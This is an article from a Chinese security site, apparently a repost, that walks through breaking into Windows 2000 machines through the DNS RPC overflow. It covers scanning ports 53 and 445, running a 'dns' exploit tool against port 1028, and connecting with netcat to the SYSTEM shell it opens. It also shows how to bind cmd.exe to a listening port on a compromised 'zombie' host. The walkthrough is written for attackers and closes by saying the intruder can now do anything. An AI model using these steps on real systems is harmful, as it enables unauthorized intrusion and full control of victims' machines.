您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

详细剖析DNS漏洞入侵

2009-4-14 11:24| 投稿: security

摘要:     前提是必须要开放53、445端口     1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进...
    前提是必须要开放53、445端口     1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描.     2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,"1028 :Vulnerability"表示 1028端口存在溢出漏洞,"os:window 2000"表示系统类型为window 2000.     3、在执行dns -t 2000all ip 1028 对目标主机进行溢出.connection to target host tcp port established 成功连接到主机的tcp端口上, successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000 系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口.当出现最后这一句提示语句的时候就意味着我们要成功了.     4、怎么连接对方的1100端口呢,当然我们要使用nc了.     5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的"瑞士军刀".     下面介绍一下它的几个常用功能     1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听.-vv:显示详细的信息.-l:进行监听,监听入站信息.-p:监听所使用的端口号.     2、正如我们遇到的情况,对方已经开放了一个端口.他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了.nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口.     3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端.通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得这个shell了.nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe.-e 作用就是程序定向.-t以telnet的形式来应答.     4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80 <yan.txt,往ip为127.0.0.1的80端口提交yan.txt中的内容.     5、介绍完nc.exe的四种常用方式,现在知道如何使用nc来链接对方的1100端口了吧,我们使用nc -vv 127.0.0.1 1100 连接对方的1100端口, 成功获得了一个具有system权限的cmdshell,现在想干什么就干什么了.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部